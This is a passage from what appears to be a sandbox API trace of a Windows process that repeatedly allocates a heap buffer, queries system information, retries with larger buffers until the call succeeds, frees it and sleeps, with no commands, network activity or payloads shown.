hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.972] Sleep (dwMilliseconds=0x110) [0201.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.196] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.197] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.197] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.198] Sleep (dwMilliseconds=0x110) [0201.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.253] Sleep (dwMilliseconds=0x110) [0201.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.336] Sleep (dwMilliseconds=0x110) [0201.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.351] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.352] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.352] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.352] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.386] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.386] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.387] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.393] Sleep (dwMilliseconds=0x110) [0201.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.441] Sleep (dwMilliseconds=0x110) [0201.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.509] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.509] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.509] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.510] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.510] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.511] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.512] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.512] Sleep (dwMilliseconds=0x110) [0201.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.571] Sleep (dwMilliseconds=0x110) [0201.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.585] Sleep (dwMilliseconds=0x110) [0201.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.595] Sleep (dwMilliseconds=0x110) [0201.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.613] Sleep (dwMilliseconds=0x110) [0201.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.627] Sleep (dwMilliseconds=0x110) [0201.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.663] Sleep (dwMilliseconds=0x110) [0201.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.720] Sleep (dwMilliseconds=0x110) [0201.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 